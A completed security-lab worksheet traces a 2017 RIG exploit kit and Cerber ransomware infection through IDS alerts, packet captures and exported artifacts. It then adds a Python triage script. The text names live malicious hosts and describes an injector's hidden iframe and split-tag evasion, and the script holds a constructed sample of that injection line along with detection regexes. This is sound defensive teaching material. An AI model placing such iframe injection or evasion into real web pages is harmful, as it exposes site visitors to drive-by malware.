Investigating a Malware Exploit
In this lab you will:
Part 1: Use Kibana to Learn About a Malware Exploit
Part 2: Investigate the Exploit with Sguil
Part 3: Use Wireshark to Investigate an Attack
Part 4: Examine Exploit Artifacts
You have been given the following details about the event:
The event happened in January of 2017.
It was discovered by the Snort NIDS.
Part 1: Use Kibana to Learn About a Malware Exploit
Narrow the time range in the main Kibana dashboard, then go to the NIDS Alert Data dashboard.
Click the first point on the timeline to filter for only that first event.
Investigating a Malware Exploit 1
Then view the NIDS Alerts to answer the following questions:
💡 What is the time of the first detected NIDS alert in Kibana?
Jan 27, 2017 – 22:54:43
💡 What is the source IP address in the alert?
172.16.4.193
💡 What is the destination IP address in the alert?
194.87.234.129
💡 What is the destination port in the alert? What service is this?
80, HTTP
💡 What is the classification of the alert?
Trojan Activity
💡 What is the destination geo country name?
Russia
💡 What is the malware family for this event?
Exploit_Kit_RIG
Open Sguil and select alert ID 5.26 (the same time as the first detected NIDS alert).
💡 What is the severity of the exploit?
The signature severity is Major.
💡 What is an Exploit Kit (EK)? Search on the internet to answer this question.
The RIG exploit kit is a set of malicious JavaScript scripts embedded in compromised or malicious websites by the threat actors, which are then promoted through malvertising.
Click the alert _id value to pivot to CapME and inspect the transcript of the event.
💡 What website did the user intend to connect to?
www.homeimprovement.com
💡 What URL did the browser refer the user to?
tyu.benme.com
💡 What kind of content is requested by the source host from tyu.benme.com? Why could this be a problem? Look in the DST server block of the transcript too.
The content is shown as gzip. It is probably a malware file. Because it is compressed, the contents of the file are obfuscated. It is not easy to see what is in the file.
Click the HTTP entry located under Zeek Hunting, then scroll down to the HTTP – Sites section of the dashboard.
💡 What are some of the websites that are listed?
💡 Which of these sites is likely part of the exploit campaign?
p27dokhpz2n7nvgr.1jw2lx.top
homeimprovement.com
tyu.benme.com
spotsbill.com
retrotip.visionurbana.com.ve
💡 What are the HTTP – MIME Types listed in the Tag Cloud?
Part 2: Investigate the Exploit with Sguil
Select alert ID 5.2 (Event message: ET CURRENT Evil Redirector Leading to EK Jul 12 2016).
💡 According to the IDS signature rule, which malware family triggered this alert? You may need to scroll through the alert signature to find this entry.
💡 According to the Event Messages in Sguil, what exploit kit (EK) is involved in this attack?
RIG EK Exploit
💡 Beyond labelling the attack as trojan activity, what other information is provided regarding the type and name of the malware involved?
ransomware, Cerber
💡 By your best estimate, looking at the alerts so far, what is the basic vector of this attack? How did the attack take place?
By visiting a malicious web page.
For alert ID 5.2:
💡 What are the referrer and host websites that are involved in the first SRC event? What do you think the user did to generate this alert?
The user issued a search on Bing with the search terms “home improvement remodeling your kitchen.” The user clicked the www.homeimprovement.com link and visited that site.
For alert ID 5.24:
💡 What kind of request was involved?
HTTP/1.1 GET request
💡 Were any files requested?
dle_js.js
💡 What is the URL for the referer and the host website?
The referer website was www.homeimprovement.com/remodeling-your-kitchen-cabinets.html, and the host website was retrotip.visionurbana.com.ve.
💡 How was the content encoded?
gzip
For alert ID 5.25:
💡 How many requests and responses were involved in this alert?
3 requests and 3 responses
💡 What was the first request?
GET /?ct=Vivaldi&biw=Vivaldi.95ec
💡 Who was the referrer?
www.homeimprovement.com/remodeling-your-kitchen-cabinets.html
💡 Who was the host server request to?
tyu.benme.com
💡 Was the response encoded?
Yes, gzip
💡 What was the second request?
POST /?oq=CEh3h8…. Vivaldi
💡 Who was the host server request to?
tyu.benme.com
💡 Was the response encoded?
Yes, gzip
💡 What was the third request?
GET /?biw=SeaMonkey.105….
💡 Who was the referrer?
http://tyu.benme.com/?biw…
💡 What was the Content-Type of the third response?
application/x-shockwave-flash
💡 What were the first 3 characters of the data in the response? The data starts after the last DST: entry.
CWS
💡 What type of file was downloaded? What application uses this type of file?
💡 How many files are there, and what are the file types?
Right-click the same ID again and choose Network Miner. Click the Files tab.
Part 3: Use Wireshark to Investigate an Attack
💡 What website directed the user to the www.homeimprovement.com website?
Bing
For alert ID 5.2:
For alert ID 5.24:
💡 What is the http request for?
A JavaScript file that is named dle_js.js.
💡 What is the host server?
retrotip.visionurbana.com.ve
Create a Hash for an Exported Malware File.
VirusTotal will return a list of the virus detection engines that have a rule that matches this hash.
💡 What did VirusTotal tell you about this file?
34 of 59 antivirus programs have rules that identify this hash as coming from a malware file.
Part 4: Examine Exploit Artifacts
Open the dle_js.js file.
💡 What does the file do?
The file is a JavaScript snippet that uses the document.write method to dynamically generate and insert HTML content into a web page, creating an iframe that takes the user to a URI at tyu.benme.com.
💡 How does the code in the JavaScript file attempt to avoid detection?
By splitting the end iframe tag into two pieces: '</ifr' + 'ame>'.
In a text editor, open the text/html file that was saved to your home folder with Vivaldi as part of the filename.
💡 What kind of file is it?
An HTML webpage
💡 What are some interesting things about the iframe? Does it call anything?
It is hidden. It calls a start() function.
💡 What does the start() function do?
It writes to the browser window. It creates an HTML form and submits the variable NormalURL through POST. The NormalURL variable equals a URI at tyu.benme.com.
💡 What do you think the purpose of the getBrowser() function is?
The getBrowser() function determines the type of browser that the webpage is displayed in.
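The three artifact checks the lab performs by hand (hashing an exported file for VirusTotal in Part 3, reading the "CWS" signature of the Flash response in Part 2, and spotting the split '</ifr' + 'ame>' tag in Part 4) can be scripted as triage heuristics. The script below is an added example, not part of the lab or the captured dle_js.js; the JavaScript and SWF inputs are constructed to mirror what the lab describes, and the regexes are assumptions about how the split-tag trick looks in source.

```python
import hashlib
import re
from typing import List, Optional

# Constructed sample mimicking the structure the lab describes: document.write()
# emitting a hidden iframe whose closing tag is split across two string literals.
# This is NOT the real dle_js.js; the hostname is the one named in the lab text.
SAMPLE_JS = (
    "document.write('<iframe src=\"http://tyu.benme.com/?biw=EXAMPLE\" "
    "width=\"1\" height=\"1\" style=\"visibility:hidden\"></ifr' + 'ame>');"
)
BENIGN_JS = "document.getElementById('menu').style.display = 'block';"
SAMPLE_SWF = b"CWS\x0f" + b"\x00" * 12   # constructed: CWS = zlib-compressed SWF header

def sha256_hex(data: bytes) -> str:
    """Hash an exported artifact so it can be looked up on VirusTotal."""
    return hashlib.sha256(data).hexdigest()

def swf_kind(data: bytes) -> Optional[str]:
    """Classify a Flash file by its 3-byte signature: FWS raw, CWS zlib, ZWS LZMA."""
    return {b"FWS": "uncompressed SWF",
            b"CWS": "zlib-compressed SWF",
            b"ZWS": "lzma-compressed SWF"}.get(data[:3])

# A tag name interrupted by quote, '+', quote, e.g. '</ifr' + 'ame>'
SPLIT_TAG = re.compile(r"<\s*/?\s*[a-z]*['\"]\s*\+\s*['\"][a-z]*\s*>", re.I)
# document.write() whose argument builds an <iframe>
DOCWRITE_IFRAME = re.compile(r"document\.write\s*\(.*<\s*iframe", re.I | re.S)
# Frame styled to be invisible or 0/1 pixel high
HIDDEN_FRAME = re.compile(
    r"visibility\s*:\s*hidden|display\s*:\s*none|height=[\"']?[01][\"']?", re.I)

def js_indicators(src: str) -> List[str]:
    """Return the names of the delivery/obfuscation heuristics that fire on src."""
    hits = []
    if SPLIT_TAG.search(src):
        hits.append("split-tag")
    if DOCWRITE_IFRAME.search(src):
        hits.append("docwrite-iframe")
    if HIDDEN_FRAME.search(src):
        hits.append("hidden-frame")
    return hits

if __name__ == "__main__":
    print("sha256:", sha256_hex(SAMPLE_JS.encode()))
    print("swf:", swf_kind(SAMPLE_SWF))
    print("sample:", js_indicators(SAMPLE_JS), "benign:", js_indicators(BENIGN_JS))
```

Run it against the files exported from NetworkMiner to get the hash for VirusTotal and a quick verdict on whether the JavaScript shows the same split-tag and hidden-iframe pattern the lab found.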